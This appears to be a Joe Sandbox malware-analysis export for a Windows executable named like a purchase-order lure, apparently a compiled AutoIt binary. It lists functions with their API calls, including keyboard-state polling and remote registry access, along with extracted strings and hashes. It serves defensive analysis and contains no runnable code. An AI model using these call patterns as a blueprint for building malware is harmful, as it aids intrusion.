                        • Instruction ID: 873dee671b7bb93a35a227ebc87d45fabdeddb515104fe9351dc1155fff7d73c
                        • Opcode Fuzzy Hash: 2cc027247c48380cba39917508b99a864b5a697f171715d57fd01727d57c3ac9
                        • Instruction Fuzzy Hash: 40515A75900709EFCB16CFA8EC85EAEBBB9EF48710F14841DF95AA7250C735A841CB50
                        APIs
                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00312AA6,?,?), ref: 00313B0E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E6
                        • API String ID: 3964851224-433370824
                        • Opcode ID: f102668765818bea7981748e28580430a1fed709cd70552a2252be7749260518
                        • Instruction ID: ffbcdba4a2cad63e916e24dc25f26f95445a6abf893a7cdd3737305751221c6c
                        • Opcode Fuzzy Hash: f102668765818bea7981748e28580430a1fed709cd70552a2252be7749260518
                        • Instruction Fuzzy Hash: B941D7341102468FCF0AEF04D940BEA3366BF1A354F154528FC525B295DB70DEA9CF91
                        APIs
                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00323C64,00000010,00000000,Bad directive syntax error,0034DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 002F32D1
                        • LoadStringW.USER32(00000000,?,00323C64,00000010), ref: 002F32D8
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • _wprintf.LIBCMT ref: 002F3309
                        • __swprintf.LIBCMT ref: 002F332B
                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002F3395
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"7
                        • API String ID: 1506413516-731021026
                        • Opcode ID: 9f829d4a6917d740461df62184f2f60fcf0675c76fca26a8103e2977cc868ec0
                        • Instruction ID: 903bb2edd3af9f8912579fbf8799ae2a46697ceace6fed4d65b5f5c50d8b0b6f
                        • Opcode Fuzzy Hash: 9f829d4a6917d740461df62184f2f60fcf0675c76fca26a8103e2977cc868ec0
                        • Instruction Fuzzy Hash: 73216D3186021EFBDF02EF90CC4AEEE7779BF24740F004456F615A10A1DAB1AA68DF90
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 002FD567
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 002FD589
                        • __swprintf.LIBCMT ref: 002FD5DC
                        • _wprintf.LIBCMT ref: 002FD68D
                        • _wprintf.LIBCMT ref: 002FD6AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LoadString_wprintf$__swprintf_memmove
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 2116804098-2391861430
                        • Opcode ID: a83e1465f811b30c78c2e634c3c250de09db895b4bc82b548fdab4094803ebbe
                        • Instruction ID: 912b88e427508ace5fe2613acedcdcb28a6456f150ac86ddaed0403d8011ffca
                        • Opcode Fuzzy Hash: a83e1465f811b30c78c2e634c3c250de09db895b4bc82b548fdab4094803ebbe
                        • Instruction Fuzzy Hash: 43519372910109BACB15FBA0DD82EEEF7B9AF14740F104566F205B21A1EB716F68DF60
                        APIs
                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 002FD37F
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002FD3A0
                        • __swprintf.LIBCMT ref: 002FD3F3
                        • _wprintf.LIBCMT ref: 002FD499
                        • _wprintf.LIBCMT ref: 002FD4B7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LoadString_wprintf$__swprintf_memmove
                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                        • API String ID: 2116804098-3420473620
                        • Opcode ID: 1430ae594a3f8a0e6bfe3c80ece1c54fe55a70eb448c79c157cf654899d41a51
                        • Instruction ID: a88975fa34d7d4b263330819734825422b3eb6a8534fd2b1d54da529335c8637
                        • Opcode Fuzzy Hash: 1430ae594a3f8a0e6bfe3c80ece1c54fe55a70eb448c79c157cf654899d41a51
                        • Instruction Fuzzy Hash: F851B472910109BADB15FBA0CD82EEEF7B9AF14744F104466F205B20A1EB716F68DF60
                        APIs
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • _memset.LIBCMT ref: 002EAF74
                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002EAFA9
                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002EAFC5
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002EAFE1
                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002EB00B
                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002EB033
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002EB03E
                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002EB043
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                        • API String ID: 1411258926-22481851
                        • Opcode ID: 62721e22e14da508ed0ff296e6b0bfb2649eea694226d9bb492c3d13d4cd4bb0
                        • Instruction ID: 2a473eee6e7ce5c65feaaadc4f30504b77d7cdd0395e2d3e9226856bddc5b301
                        • Opcode Fuzzy Hash: 62721e22e14da508ed0ff296e6b0bfb2649eea694226d9bb492c3d13d4cd4bb0
                        • Instruction Fuzzy Hash: 3E410C75C20629ABCF15EFA4DC959EEB7B8BF14740F404069F901A2151EB719E25CF50
                        APIs
                        • __swprintf.LIBCMT ref: 002F7226
                        • __swprintf.LIBCMT ref: 002F7233
                          • Part of subcall function 002D234B: __woutput_l.LIBCMT ref: 002D23A4
                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 002F725D
                        • LoadResource.KERNEL32(?,00000000), ref: 002F7269
                        • LockResource.KERNEL32(00000000), ref: 002F7276
                        • FindResourceW.KERNEL32(?,?,00000003), ref: 002F7296
                        • LoadResource.KERNEL32(?,00000000), ref: 002F72A8
                        • SizeofResource.KERNEL32(?,00000000), ref: 002F72B7
                        • LockResource.KERNEL32(?), ref: 002F72C3
                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002F7322
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                        • String ID: L66
                        • API String ID: 1433390588-3228019034
                        • Opcode ID: bf6a961c523a5ee0bff5c4286d1335a6b0ec9b894f18eabefb3bca9bb223c15b
                        • Instruction ID: 2920abbe20473c07a9f8fc5f65c4d59c0f4fcbd295daaf3397a4999dc84554ac
                        • Opcode Fuzzy Hash: bf6a961c523a5ee0bff5c4286d1335a6b0ec9b894f18eabefb3bca9bb223c15b
                        • Instruction Fuzzy Hash: 7D31907191425ABBDB129F60EC85ABFBBADFF04380F004825FE05D2151E774D961DBA0
                        APIs
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002F843F
                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002F8455
                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002F8466
                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002F8478
                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002F8489
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: SendString$_memmove
                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                        • API String ID: 2279737902-1007645807
                        • Opcode ID: 73a9e3cc7ec01e2152e0f0daa3638847e4ef23a37f96617950c3e6db7085cf4f
                        • Instruction ID: 0d9657ffda68272c695646f0b2544166419142fb89520717c230a1a3586ad9a7
                        • Opcode Fuzzy Hash: 73a9e3cc7ec01e2152e0f0daa3638847e4ef23a37f96617950c3e6db7085cf4f
                        • Instruction Fuzzy Hash: DD11E7A1A6016E79D711EBA1CC4ADFFBB7CEFD1B80F004429B411A30C5DEA05E18C9B0
                        APIs
                        • timeGetTime.WINMM ref: 002F809C
                          • Part of subcall function 002CE3A5: timeGetTime.WINMM(?,75C0B400,00326163), ref: 002CE3A9
                        • Sleep.KERNEL32(0000000A), ref: 002F80C8
                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 002F80EC
                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 002F810E
                        • SetActiveWindow.USER32 ref: 002F812D
                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002F813B
                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 002F815A
                        • Sleep.KERNEL32(000000FA), ref: 002F8165
                        • IsWindow.USER32 ref: 002F8171
                        • EndDialog.USER32(00000000), ref: 002F8182
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                        • String ID: BUTTON
                        • API String ID: 1194449130-3405671355
                        • Opcode ID: 32444d3a8e25146eca1e176b0b7bd6f86d6955ebd1504ccb573eeccb8921237a
                        • Instruction ID: 8b82ac857839c61fabe3b181a6ec2bd60dbc8fd3041e2e1245cbbe431fe5b2f6
                        • Opcode Fuzzy Hash: 32444d3a8e25146eca1e176b0b7bd6f86d6955ebd1504ccb573eeccb8921237a
                        • Instruction Fuzzy Hash: D5218E71360209BFE7275F22EC8DE36BB6EE7053C9F440228F61982261CF724D65AA11
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                        • String ID: 0.0.0.0
                        • API String ID: 208665112-3771769585
                        • Opcode ID: 0756519dcc5dbaa8157a5c6d02b82c2fdfc6e2fb3fd88a161c7377d83d9f5e07
                        • Instruction ID: 1b93d6b49f8426bddee153dd4ffe34238b921ef9601119991af8ffb8eee821c4
                        • Opcode Fuzzy Hash: 0756519dcc5dbaa8157a5c6d02b82c2fdfc6e2fb3fd88a161c7377d83d9f5e07
                        • Instruction Fuzzy Hash: F9112731918119AFDB21AF70EC4AEEAB3ACEF00720F000176F50596190EFB0DFA08A60
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                        • String ID:
                        • API String ID: 3566271842-0
                        • Opcode ID: 102219a2fa203e965f061624e6cbbdcb3e5f929bd15055c4a73408dff1bb7131
                        • Instruction ID: 22f3463b42c093dfbf5fa774636fd1792e17d9826fa1f5921107e8fcd762c164
                        • Opcode Fuzzy Hash: 102219a2fa203e965f061624e6cbbdcb3e5f929bd15055c4a73408dff1bb7131
                        • Instruction Fuzzy Hash: 76715F75A11219AFCB15DFA4C894ADEB7B8FF48350F008496E919EB261DB30EE50CF90
                        APIs
                        • GetKeyboardState.USER32(?), ref: 002F3908
                        • SetKeyboardState.USER32(?), ref: 002F3973
                        • GetAsyncKeyState.USER32(000000A0), ref: 002F3993
                        • GetKeyState.USER32(000000A0), ref: 002F39AA
                        • GetAsyncKeyState.USER32(000000A1), ref: 002F39D9
                        • GetKeyState.USER32(000000A1), ref: 002F39EA
                        • GetAsyncKeyState.USER32(00000011), ref: 002F3A16
                        • GetKeyState.USER32(00000011), ref: 002F3A24
                        • GetAsyncKeyState.USER32(00000012), ref: 002F3A4D
                        • GetKeyState.USER32(00000012), ref: 002F3A5B
                        • GetAsyncKeyState.USER32(0000005B), ref: 002F3A84
                        • GetKeyState.USER32(0000005B), ref: 002F3A92
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: State$Async$Keyboard
                        • String ID:
                        • API String ID: 541375521-0
                        • Opcode ID: 4b8bd4d23904c1ee8a8cf092156d43b7da0217f30d108d433db6dfb46fe7a076
                        • Instruction ID: 5e80c681e4f302c1862312c3a560087e32381335c3aba10e10af8ecaa7c4e80c
                        • Opcode Fuzzy Hash: 4b8bd4d23904c1ee8a8cf092156d43b7da0217f30d108d433db6dfb46fe7a076
                        • Instruction Fuzzy Hash: 8A51C620A1478D29FB35EFA488117FAEFF45F013C0F0885AAD6C2561C2DA949B9CCB65
                        APIs
                        • GetDlgItem.USER32(?,00000001), ref: 002EFB19
                        • GetWindowRect.USER32(00000000,?), ref: 002EFB2B
                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 002EFB89
                        • GetDlgItem.USER32(?,00000002), ref: 002EFB94
                        • GetWindowRect.USER32(00000000,?), ref: 002EFBA6
                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 002EFBFC
                        • GetDlgItem.USER32(?,000003E9), ref: 002EFC0A
                        • GetWindowRect.USER32(00000000,?), ref: 002EFC1B
                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 002EFC5E
                        • GetDlgItem.USER32(?,000003EA), ref: 002EFC6C
                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 002EFC89
                        • InvalidateRect.USER32(?,00000000,00000001), ref: 002EFC96
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ItemMoveRect$Invalidate
                        • String ID:
                        • API String ID: 3096461208-0
                        • Opcode ID: a912ddb20dc0500df13aa5547ea7d35962da9c7d6f70a6ea7e98028a20e276e4
                        • Instruction ID: 27036a9f8f4a7ee99ca674b0dd8d61744f11b1e17253a487075ec6107553bca9
                        • Opcode Fuzzy Hash: a912ddb20dc0500df13aa5547ea7d35962da9c7d6f70a6ea7e98028a20e276e4
                        • Instruction Fuzzy Hash: E4512171B10209AFDB18CF69DD95AAEBBBAFB88714F54813DF915D7290D7709D008B10
                        APIs
                          • Part of subcall function 002B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B4954,00000000), ref: 002B4A23
                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,002CB85B), ref: 002CB926
                        • KillTimer.USER32(00000000,?,00000000,?,?,?,?,002CB85B,00000000,?,?,002CAF1E,?,?), ref: 002CB9BD
                        • DestroyAcceleratorTable.USER32(00000000), ref: 0032E775
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002CB85B,00000000,?,?,002CAF1E,?,?), ref: 0032E7A6
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002CB85B,00000000,?,?,002CAF1E,?,?), ref: 0032E7BD
                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002CB85B,00000000,?,?,002CAF1E,?,?), ref: 0032E7D9
                        • DeleteObject.GDI32(00000000), ref: 0032E7EB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                        • String ID:
                        • API String ID: 641708696-0
                        • Opcode ID: 71641c2b63721fb32e61fb0dd99e161cefdefe083be0ac121eb51ca443ad6883
                        • Instruction ID: 13ae9267477d0b7a5f0f7e2345f117e9fbd3cd792f4a39e140f9ce7db9bc9146
                        • Opcode Fuzzy Hash: 71641c2b63721fb32e61fb0dd99e161cefdefe083be0ac121eb51ca443ad6883
                        • Instruction Fuzzy Hash: A361A932120721EFDB379F69E88AB25B7F9FB45712F14061DE19A86570C7B0A8A0DF41
                        APIs
                          • Part of subcall function 002CB155: GetWindowLongW.USER32(?,000000EB), ref: 002CB166
                        • GetSysColor.USER32(0000000F), ref: 002CB067
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ColorLongWindow
                        • String ID:
                        • API String ID: 259745315-0
                        • Opcode ID: 89021f814bc58bf6dece317ce730523e09bacb8543e36377709b1bee43dad1ca
                        • Instruction ID: 0a7d8f21b5831949481870cf41212c57bc9c3a36051eede50c08a8299d1f1693
                        • Opcode Fuzzy Hash: 89021f814bc58bf6dece317ce730523e09bacb8543e36377709b1bee43dad1ca
                        • Instruction Fuzzy Hash: 3F41A131510510AFDB235F38EC8AFBA3B69AB06721F184369FD758A1E1D7718C51DB22
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                        • String ID:
                        • API String ID: 136442275-0
                        • Opcode ID: 0cbdef5c4412a9b90ada2eac0e62d59fbda754d5a8dee1cc5d1f428b653ef66d
                        • Instruction ID: 334356e7797fdf53ed1c648f28d8386b1f946f38055ef97f3f6e9b2008ee6931
                        • Opcode Fuzzy Hash: 0cbdef5c4412a9b90ada2eac0e62d59fbda754d5a8dee1cc5d1f428b653ef66d
                        • Instruction Fuzzy Hash: 2341F17291411CAADB21EB50CC55EEEB3BCAB08350F5041E7F619A2151EB71AFE8CF64
                        APIs
                        • __swprintf.LIBCMT ref: 002B84E5
                        • __itow.LIBCMT ref: 002B8519
                          • Part of subcall function 002D2177: _xtow@16.LIBCMT ref: 002D2198
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
